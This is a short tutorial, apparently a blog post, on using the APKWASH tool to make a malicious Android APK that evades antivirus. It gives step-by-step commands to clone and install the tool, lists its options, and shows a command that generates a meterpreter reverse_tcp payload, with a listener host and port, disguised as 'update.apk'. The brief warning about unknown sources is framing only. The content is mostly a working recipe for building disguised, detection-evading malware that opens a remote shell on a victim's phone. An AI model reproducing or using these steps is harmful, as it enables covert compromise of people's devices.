Bypassing antivirus on android is one of the most difficult tasks. Well, at least it used to be until we got tools like apk bleach. Now there is yet another tool called APKWASH which can hide malicious apps from getting discovered by most antivirus. It shows how weak antivirus software is and why you should not download apps from unknown sources. Let’s start the tutorial to show you how hackers bypass antivirus protection on android:
Step 1: Download the APKWASH Tool and clone it in Kali Linux with the following command:
git clone https://github.com/jbreed/apkwash.git
Step 2: Give the tool execution permissions with the following command as shown below:
chmod +x apkwash mv apkwash /usr/local/bin/.
Step 3: Now we can use the following command to make the malicious file:
Below are the options you can use to make the malicious files
-p | –payload <payload> This sets the payload to be generated by msfvenom.
-o | –output <outfile.apk> This sets the name of the APK created as well as the output apk file.
-x | –original <infile.apk> Input APK to inject the payload into (later update).
-g | –generate Generate a payload using defaults
-n | –newkey Generate a new debug key before signing
-v | –verbose Don’t mask output of commands
-d | –debug Leaves the /tmp/payload files in place for review
-h | –help Help information
apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 -o update.apk
Step 4: Now you have the malicious apk file which cannot be detected by antivirus. There is a few antiviruses that might flag this file as a virus but its rare and doesn’t happen frequently.
Feel free to edit the script and improve it if you are great at coding and scripting.